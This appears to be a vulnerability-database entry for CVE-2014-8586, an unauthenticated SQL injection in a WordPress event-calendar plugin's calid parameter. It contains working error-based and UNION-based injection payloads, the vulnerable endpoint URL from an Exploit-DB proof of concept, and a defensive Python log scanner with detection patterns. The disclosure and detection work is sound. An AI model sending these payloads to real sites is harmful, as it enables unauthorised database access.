CVE-2014-8586
Published 2014-11-04
Priority P2 · 64 · high · 7.5 CVSS 2.0 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: yes (see Exploit-DB and Metasploit below)
EPSS 40.09% (98.5th percentile)
SQL injection vulnerability in the CP Multi View Event Calendar plugin 1.01 for WordPress allows remote attackers to execute arbitrary SQL commands via the calid parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cp_multi_view_event_calendar_project | cp_multi_view_event_calendar | — | — |
Detection & IOCs (extracted from sources)
- Command: `calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)`
- Command: `calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#`
- Monitor GET requests targeting the WordPress CP Multi-View Event Calendar plugin endpoint with parameters cpmvc_do_action=mvparse, f=datafeed, method=list, and a suspicious calid parameter value (e.g., containing SQL keywords such as RLIKE, UNION, SELECT, BENCHMARK, AND/OR).
- Detect boolean-based blind SQLi attempts via RLIKE with CASE/WHEN constructs in the calid GET parameter.
- Detect error-based SQLi attempts using INFORMATION_SCHEMA.CHARACTER_SETS with FLOOR(RAND()) GROUP BY in the calid GET parameter.
- Detect UNION-based SQLi with 14 NULL columns in the calid GET parameter; the UNION query uses a 14-column schema specific to this plugin's datafeed query.
- Detect time-based blind SQLi via BENCHMARK(5000000,MD5(...)) in the calid GET parameter; the heavy query causes a measurable response delay.
- A Metasploit auxiliary scanner module exists for this vulnerability, targeting the unauthenticated SQL injection in CP Multi-View Calendar; watch for automated scanning patterns against the datafeed endpoint.
- The vulnerability is unauthenticated — no WordPress login is required to exploit it, so perimeter WAF rules on the datafeed endpoint are the primary preventive control.
- The calid parameter is entirely unsanitized; any integer-type allowlist enforcement on this parameter at the WAF/application layer will block all known attack vectors.
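The integer allowlist and keyword checks from the notes above, as an added example (not the page's, the plugin's, or any vendor's code): a small Python scanner that parses access-log GET lines, keeps only requests to the mvparse/datafeed/list endpoint, and flags any calid value that is not a plain integer, labelling it by the technique the keywords suggest. The log lines and the technique labels are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Added example (not the plugin's or the page's code): scan access-log lines for
# datafeed requests whose calid value is not a plain integer, per the notes above.
def is_datafeed_request(params):
    """True for the plugin's datafeed endpoint named in the detection notes."""
    return (params.get("cpmvc_do_action", [""])[0] == "mvparse"
            and params.get("f", [""])[0] == "datafeed"
            and params.get("method", [""])[0] == "list")

def classify_calid(raw):
    """None for an integer calid (the allowlist), else a technique label; checks run
    most-specific first so an error-based payload with CASE/WHEN is not misfiled."""
    if re.fullmatch(r"[0-9]+", raw):
        return None
    checks = [
        ("union-based", r"\bUNION\b.*\bSELECT\b"),
        ("time-based", r"\bBENCHMARK\s*\("),
        ("error-based", r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND"),
        ("boolean-based", r"\bRLIKE\b|\bCASE\b.*\bWHEN\b"),
        ("sql-keyword", r"\b(SELECT|AND|OR)\b"),
    ]
    for label, pattern in checks:
        if re.search(pattern, raw, re.IGNORECASE):
            return label
    return "non-integer"

def scan_log(lines):
    """Return (line_no, label, calid) for each suspicious datafeed request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        if not is_datafeed_request(params) or "calid" not in params:
            continue
        label = classify_calid(params["calid"][0])
        if label:
            hits.append((n, label, params["calid"][0]))
    return hits

# Constructed sample log lines (not real traffic); the last one is off-endpoint.
BASE = "/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid="
SAMPLE_LOG = [
    f'10.0.0.5 - - [27/Oct/2014:10:00:01 +0000] "GET {BASE}1 HTTP/1.1" 200 512',
    f'10.0.0.9 - - [27/Oct/2014:10:00:02 +0000] "GET {BASE}1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 512',
    f'10.0.0.9 - - [27/Oct/2014:10:00:03 +0000] "GET {BASE}1%20AND%20BENCHMARK(5000000,MD5(1)) HTTP/1.1" 200 512',
    '10.0.0.7 - - [27/Oct/2014:10:00:04 +0000] "GET /wp-login.php?calid=1%20UNION HTTP/1.1" 200 512',
]
```

Running `scan_log(SAMPLE_LOG)` reports only the second and third lines; a request that carries the same keywords to a different endpoint is left alone, which keeps the rule scoped to this plugin's datafeed query.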
No detection rules found.
Exploit-DB
WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection (exploitdb · 2014-10-27)
---
######################
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
# Date : 2014-10-23
# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
CP Multi View Event Calendar 1.01 suffers from a SQL injection vulnerability;
the calid variable is not sanitized.
######################
# PoC
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli]
# Sqlmap
---
Place: GET
Parameter: calid
Type: boolean-based blind
Title: MySQL b
Metasploit
WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner (metasploit)
This module will scan given instances for an unauthenticated SQL injection within the CP Multi-View Calendar plugin v1.1.4 for WordPress.
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/113670
- http://packetstormsecurity.com/files/128814/WordPress-CP-Multi-View-Event-Calendar-1.01-SQL-Injection.html
- http://www.exploit-db.com/exploits/35073
- http://www.securityfocus.com/bid/70718
- https://exchange.xforce.ibmcloud.com/vulnerabilities/97766